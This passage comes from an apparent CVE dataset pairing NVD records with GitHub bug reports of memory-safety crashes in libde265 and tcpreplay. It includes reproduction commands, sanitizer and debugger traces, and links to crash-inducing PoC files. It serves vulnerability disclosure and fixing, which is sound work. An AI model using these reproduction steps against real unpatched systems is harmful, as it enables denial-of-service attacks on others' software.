#3 0x4ec6a1 in decoder_context::decode(int*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1328:16
#4 0x4d3645 in de265_decode /home/lzy/fuzz/oss/libde265/libde265/de265.cc:367:15
#5 0x4d0363 in main /home/lzy/fuzz/oss/libde265/dec265/dec265.cc:764:17
#6 0x7efcae0bc082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16
#7 0x41e5bd in _start (/home/lzy/fuzz/oss/libde265/dec265/dec265+0x41e5bd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:2007:20 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*)
==3838968==ABORTING
```
### POC
[https://github.com/blu3sh0rk/Fuzzing-crash/blob/main/SEGV.zip](url)
### GDB INFO
```
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────$rax : 0x0
$rbx : 0x007fffffff3180 → 0x0061b0000f1494 → 0x0000000000000000
$rcx : 0x6f2
$rdx : 0x637
$rsp : 0x007fffffff30e0 → 0x0000000041b58ab3
$rbp : 0x007fffffff35f0 → 0x007fffffff3970 → 0x007fffffff3b30 → 0x007fffffff3ca0 → 0x007fffffff3cd0 → 0x007fffffffe0c0 → 0x0000000000000000
$rsi : 0x600
$rdi : 0x00621000000718 → 0x0000000000000000
$rip : 0x000000004e2220 → <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov al, BYTE PTR [rax]
$r8 : 0x00621000000100 → 0x000000006f97b0 → 0x000000004db200 → <decoder_context::~decoder_context()+0> push rbp
$r9 : 0x007ffff43ff800 → 0xbeddbeddddbeddbe
$r10 : 0x24b
$r11 : 0x240
$r12 : 0x0000000041e590 → <_start+0> endbr64
$r13 : 0x007fffffffe1b0 → 0x0000000000000002
$r14 : 0x200
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────0x007fffffff30e0│+0x0000: 0x0000000041b58ab3 ← $rsp
0x007fffffff30e8│+0x0008: 0x000000006fac63 → "4 32 16 7 agg.tmp 64 16 9 agg.tmp36 96 16 9 agg.tm[...]"
0x007fffffff30f0│+0x0010: 0x000000004e1eb0 → <decoder_context::process_slice_segment_header(slice_segment_header*,+0> push rbp
0x007fffffff30f8│+0x0018: 0x006290000b4418 → 0xbebebe0000000004
0x007fffffff3100│+0x0020: 0x0061b0000f1534 → 0x0000000000000000
0x007fffffff3108│+0x0028: 0x006290000b649c → 0x00000d00000001 → 0x0000000000000000
0x007fffffff3110│+0x0030: 0x0061b0000f14cc → 0x0000000000000002
0x007fffffff3118│+0x0038: 0x006290000b649c → 0x00000d00000001 → 0x0000000000000000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x4e220d <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov rdi, QWORD PTR [rbx+0x320]
0x4e2214 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> call 0x49f990 <__asan_report_load1>
0x4e2219 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov rax, QWORD PTR [rbx+0x320]
→ 0x4e2220 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov al, BYTE PTR [rax]
0x4e2222 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> and al, 0x1
0x4e2224 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> movzx eax, al
0x4e2227 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> cmp eax, 0x0
0x4e222a <decoder_context::process_slice_segment_header(slice_segment_header*,+0> jne 0x4e22aa <decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*)+1018>
0x4e2230 <decoder_context::process_slice_segment_header(slice_segment_header*,+0> mov ecx, DWORD PTR ds:0x75b760
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:decctx.cc+2007 ──── 2002
2003
2004 // get PPS and SPS for this slice
2005
2006 int pps_id = hdr->slice_pic_parameter_set_id;
// pps_id=0x1
→ 2007 if (pps[pps_id]->pps_read==false) {
2008 logerror(LogHeaders, "PPS %d has not been read\n", pps_id);
2009 assert(false); // TODO
2010 }
2011
2012 current_pps = pps[pps_id];
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────[#0] Id 1, Name: "dec265", stopped 0x4e2220 in decoder_context::process_slice_segment_header (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────[#0] 0x4e2220 → decoder_context::process_slice_segment_header(this=0x621000000100, hdr=0x61b0000f1180, err=0x7fffffff3630, pts=0xa000, nal_hdr=0x7fffffff39e0, user_data=0x2)
[#1] 0x4e1013 → decoder_context::read_slice_NAL(this=0x621000000100, reader=@0x7fffffff39a0, nal=0x606000020d20, nal_hdr=@0x7fffffff39e0)
[#2] 0x4eb7f2 → decoder_context::decode_NAL(this=0x621000000100, nal=0x606000020d20)
[#3] 0x4ec6a2 → decoder_context::decode(this=0x621000000100, more=0x7fffffffde50)
[#4] 0x4d3646 → de265_decode(de265ctx=0x621000000100, more=0x7fffffffde50)
[#5] 0x4d0364 → main(argc=0x2, argv=0x7fffffffe1b8)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────gef➤
```
### Impact
Due to incorrect access control, a SEGV caused by a READ memory access occurred at line 2007 of the code. This issue can cause a Denial of Service attack. | SEGV:occured in function decoder_context::process_slice_segment_header at decctx.cc:2007:20 | https://api.github.com/repos/strukturag/libde265/issues/393/comments | 2 | 2023-02-20T13:07:39Z | 2023-06-13T13:34:07Z | https://github.com/strukturag/libde265/issues/393 | 1,591,846,415 | 393 |
CVE-2023-27103 | 2023-03-15T15:15:09.670 | Libde265 v1.0.11 was discovered to contain a heap buffer overflow via the function derive_collocated_motion_vectors at motion.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/394"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00032.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.11:*:*:*:*:*:*:*",
"matchCriteriaId": "75BAF096-8BC3-4430-930C-8F3E6266C21D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/394 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libde265"
] | ### Desctiption
A heap-buffer-overflow has occurred when running program dec265 in function derive_collocated_motion_vectors at motion.cc:1259:41
### Version
```
dec265 v1.0.11
git log
commit fef32a7761993702c699dfbe3699e44374eb44b5 (HEAD -> master, origin/master, origin/HEAD)
Merge: 3aea5a45 c2b60f1c
Author: Dirk Farin <[email protected]>
Date: Thu Feb 9 11:13:24 2023 +0100
```
### Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
cd dec265
./dec265 Heap-overflow-POC1
```
```
WARNING: Bit-depth of current image does not match SPS
WARNING: Bit-depth of current image does not match SPS
WARNING: Too many warnings queued
=================================================================
==137060==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000a8 at pc 0x0000006cc0b4 bp 0x7fff28554e90 sp 0x7fff28554e88
READ of size 8 at 0x6020000000a8 thread T0
#0 0x6cc0b3 in derive_collocated_motion_vectors(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, MotionVector*, unsigned char*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1259:41
#1 0x6cd4cf in derive_temporal_luma_vector_prediction(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, MotionVector*, unsigned char*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1388:5
#2 0x6cf16c in get_merge_candidate_list_without_step_9(base_context*, slice_segment_header const*, MotionVectorAccess const&, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1523:5
#3 0x6d052b in derive_luma_motion_merge_mode(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1612:3
#4 0x6d80d6 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:2088:7
#5 0x6d9435 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/motion.cc:2171:3
#6 0x5bf634 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4136:3
#7 0x5c233c in read_coding_unit(thread_context*, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4504:9
#8 0x5b17db in read_coding_quadtree(thread_context*, int, int, int, int) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4652:5
#9 0x5b0887 in read_coding_tree_unit(thread_context*) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:2861:3
#10 0x5c7fe8 in decode_substream(thread_context*, bool, bool) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:4741:5
#11 0x5cb648 in read_slice_segment_data(thread_context*) /home/lzy/fuzz/oss/libde265/libde265/slice.cc:5054:14
#12 0x4e8254 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:853:7
#13 0x4e614f in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:955:11 #14 0x4e4b1f in decoder_context::decode_some(bool*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:740:13
#15 0x4e1a3f in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:698:9
#16 0x4eb7f1 in decoder_context::decode_NAL(NAL_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1240:11
#17 0x4ec6a1 in decoder_context::decode(int*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1328:16
#18 0x4d3645 in de265_decode /home/lzy/fuzz/oss/libde265/libde265/de265.cc:367:15
#19 0x4d0363 in main /home/lzy/fuzz/oss/libde265/dec265/dec265.cc:764:17
#20 0x7fccbc3e8082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16
#21 0x41e5bd in _start (/home/lzy/fuzz/oss/libde265/dec265/dec265+0x41e5bd)
0x6020000000a8 is located 16 bytes to the right of 8-byte region [0x602000000090,0x602000000098)
allocated by thread T0 here:
#0 0x4ca8dd in operator new(unsigned long) (/home/lzy/fuzz/oss/libde265/dec265/dec265+0x4ca8dd)
#1 0x500842 in __gnu_cxx::new_allocator<slice_segment_header*>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/ext/new_allocator.h:114:27
#2 0x500751 in std::allocator_traits<std::allocator<slice_segment_header*> >::allocate(std::allocator<slice_segment_header*>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/alloc_traits.h:443:20
#3 0x4ffef1 in std::_Vector_base<slice_segment_header*, std::allocator<slice_segment_header*> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:343:20
#4 0x4ff227 in void std::vector<slice_segment_header*, std::allocator<slice_segment_header*> >::_M_realloc_insert<slice_segment_header* const&>(__gnu_cxx::__normal_iterator<slice_segment_header**, std::vector<slice_segment_header*, std::allocator<slice_segment_header*> > >, slice_segment_header* const&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/vector.tcc:440:33
#5 0x4feea3 in std::vector<slice_segment_header*, std::allocator<slice_segment_header*> >::push_back(slice_segment_header* const&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/stl_vector.h:1195:4
#6 0x4e4066 in de265_image::add_slice_segment_header(slice_segment_header*) /home/lzy/fuzz/oss/libde265/libde265/../libde265/image.h:326:12 #7 0x4e12ba in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:657:14
#8 0x4eb7f1 in decoder_context::decode_NAL(NAL_unit*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1240:11
#9 0x4ec6a1 in decoder_context::decode(int*) /home/lzy/fuzz/oss/libde265/libde265/decctx.cc:1328:16
#10 0x4d3645 in de265_decode /home/lzy/fuzz/oss/libde265/libde265/de265.cc:367:15
#11 0x4d0363 in main /home/lzy/fuzz/oss/libde265/dec265/dec265.cc:764:17
#12 0x7fccbc3e8082 in __libc_start_main /build/glibc-KZwQYS/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lzy/fuzz/oss/libde265/libde265/motion.cc:1259:41 in derive_collocated_motion_vectors(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, MotionVector*, unsigned char*)
Shadow bytes around the buggy address:
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff8000: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
=>0x0c047fff8010: fa fa 00 fa fa[fa]fd fa fa fa fd fa fa fa fd fa
0x0c047fff8020: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8030: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fa
0x0c047fff8040: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8050: fa fa 04 fa fa fa fd fa fa fa 00 00 fa fa fd fa
0x0c047fff8060: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 04 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==137060==ABORTING
```
### POC
[https://github.com/blu3sh0rk/Fuzzing-crash/blob/main/Heap-overflow-POC1.zip](url)
### Code in function derive_collocated_motion_vectors at motion.cc:1259:41
```
if (allRefFramesBeforeCurrentFrame) {
mvCol = mvi.mv[X];
refIdxCol = mvi.refIdx[X];
listCol = X;
}
else {
int N = shdr->collocated_from_l0_flag;
mvCol = mvi.mv[N];
refIdxCol = mvi.refIdx[N];
listCol = N;
}
}
1259 const slice_segment_header* colShdr = colImg->slices[ colImg->get_SliceHeaderIndex(xColPb,yColPb) ];
```
### Impact
Potentially causing DoS and RCE | A heap-buffer-overflow has occurred when running program dec265 in function derive_collocated_motion_vectors at motion.cc | https://api.github.com/repos/strukturag/libde265/issues/394/comments | 3 | 2023-02-22T03:28:35Z | 2023-04-16T20:29:41Z | https://github.com/strukturag/libde265/issues/394 | 1,594,397,865 | 394 |
CVE-2023-27783 | 2023-03-16T15:15:10.717 | An issue found in TCPreplay tcprewrite v.4.4.3 allows a remote attacker to cause a denial of service via the tcpedit_dlt_cleanup function at plugins/dlt_plugins.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/780"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/pull/781"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/780 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a reachable assertion in `tcpedit_dlt_cleanup()` when when the user uses `tcprewrite` to open a crafted pcap file in `DLT_JUNIPER_ETHER` mode.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcprewrite --dlt="jnpr_eth" -i $POC -o /dev/null`
The POC file could be downloaded here:
[POC file](https://raw.githubusercontent.com/Marsman1996/pocs/master/tcpreplay/poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion)
**Expected behavior**
Program reports assertion failure and is terminated.
The GDB report:
```
$ gdb --args ./bin_normal/bin/tcprewrite --dlt="jnpr_eth" -i ./poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion -o /dev/null
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --dlt=jnpr_eth -i ./poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion -o /dev/null
Warning: ./poc-tcprewrite-bcb107a-tcpedit_dlt_cleanup-assertion was captured using a snaplen of 96 bytes. This may mean you have truncated packets.
tcprewrite: plugins/dlt_plugins.c:462: tcpedit_dlt_cleanup: Assertion `ctx' failed.
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d6d859 in __GI_abort () at abort.c:79
#2 0x00007ffff7d6d729 in __assert_fail_base (fmt=0x7ffff7f03588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x555555572ae6 "ctx", file=0x555555572ad0 "plugins/dlt_plugins.c", line=462,
function=<optimized out>) at assert.c:92
#3 0x00007ffff7d7ef36 in __GI___assert_fail (assertion=0x555555572ae6 "ctx", file=0x555555572ad0 "plugins/dlt_plugins.c", line=462, function=0x555555572fb0 <__PRETTY_FUNCTION__.7740> "tcpedit_dlt_cleanup")
at assert.c:101
#4 0x000055555556156d in tcpedit_dlt_cleanup (ctx=0x0) at plugins/dlt_plugins.c:462
#5 0x0000555555569aca in dlt_jnpr_ether_cleanup (ctx=0x555555580090) at plugins/dlt_jnpr_ether/jnpr_ether.c:171
#6 0x000055555556158c in tcpedit_dlt_cleanup (ctx=0x555555580090) at plugins/dlt_plugins.c:466
#7 0x000055555555a763 in tcpedit_close (tcpedit_ex=0x55555557db60 <tcpedit>) at tcpedit.c:599
#8 0x0000555555558f02 in main (argc=0, argv=0x7fffffffde38) at tcprewrite.c:154
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
$ ./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
``` | [Bug] Reachable assertion in tcpedit_dlt_cleanup() at plugins/dlt_plugins.c | https://api.github.com/repos/appneta/tcpreplay/issues/780/comments | 5 | 2023-03-01T03:10:46Z | 2023-06-12T11:10:36Z | https://github.com/appneta/tcpreplay/issues/780 | 1,604,155,785 | 780 |
CVE-2023-27784 | 2023-03-16T15:15:10.767 | An issue found in TCPReplay v.4.4.3 allows a remote attacker to cause a denial of service via the read_hexstring function at the utils.c:309 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/787"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/appneta/tcpreplay/issues/787 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `read_hexstring()` when the user passes empty user dlink string to `tcprewrite` with option `--user-dlink` when the program process the pcap file whose data link type is DLT_USER0.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./tcprewrite --user-dlink="" -i $POC -o /dev/null`
The POC file could be downloaded in [POC file](https://raw.githubusercontent.com/Marsman1996/pocs/master/tcpreplay/poc-tcprewrite-bcb107a-read_hexstring-SEGV)
**Expected behavior**
Program crashes with Segmentation fault.
The GDB report is:
```
$ gdb --args ./bin_normal/bin/tcprewrite --user-dlink="" -i ./poc-tcprewrite-bcb107a-read_hexstring-SEGV -o /dev/null
(gdb) r
Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --user-dlink= -i ./poc-tcprewrite-bcb107a-read_hexstring-SEGV -o /dev/null
Program received signal SIGSEGV, Segmentation fault.
__rawmemchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:65
65 ../sysdeps/x86_64/multiarch/memchr-avx2.S: No such file or directory.
(gdb) bt
#0 __rawmemchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:65
#1 0x00007ffff7dddf36 in _IO_str_init_static_internal (sf=sf@entry=0x7fffffffbe30, ptr=ptr@entry=0x0, size=size@entry=0, pstart=pstart@entry=0x0) at strops.c:41
#2 0x00007ffff7dad4c3 in _IO_strfile_read (string=0x0, sf=0x7fffffffbe30) at ../libio/strfile.h:95
#3 __GI___isoc99_sscanf (s=0x0, format=0x555555576598 "%x") at isoc99_sscanf.c:28
#4 0x000055555556e7cf in read_hexstring (l2string=0x55555557e2a0 "", hex=0x555555581367 "", hexlen=255) at utils.c:309
#5 0x00005555555656ae in dlt_user_parse_opts (ctx=0x555555580890) at plugins/dlt_user/user.c:194
#6 0x000055555556169c in tcpedit_dlt_parse_opts (ctx=0x555555580890) at plugins/dlt_utils.c:39
#7 0x0000555555560ca5 in tcpedit_dlt_post_args (tcpedit=0x55555557ffe0) at plugins/dlt_plugins.c:210
#8 0x000055555555b575 in tcpedit_post_args (tcpedit=0x55555557ffe0) at parse_args.c:252
#9 0x0000555555558c23 in main (argc=0, argv=0x7fffffffc2e8) at tcprewrite.c:89
```
**System (please complete the following information):**
- OS: Ubuntu
- OS version: 20.04, 64 bit
- Tcpreplay Version: master bcb107a
```
$ ./bin_normal/bin/tcprewrite -V
tcprewrite version: 4.4.3 (build git:v4.4.3)
Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
The entire Tcpreplay Suite is licensed under the GPLv3
Cache file supported: 04
Not compiled with libdnet.
Compiled against libpcap: 1.9.1
64 bit packet counters: enabled
Verbose printing via tcpdump: enabled
Fragroute engine: disabled
``` | [Bug] NULL Pointer Dereference in read_hexstring() at utils.c:309 | https://api.github.com/repos/appneta/tcpreplay/issues/787/comments | 1 | 2023-03-01T14:29:21Z | 2023-06-05T02:12:40Z | https://github.com/appneta/tcpreplay/issues/787 | 1,605,081,875 | 787 |
CVE-2023-27785 | 2023-03-16T15:15:10.823 | An issue found in TCPreplay TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse endpoints function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/785"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
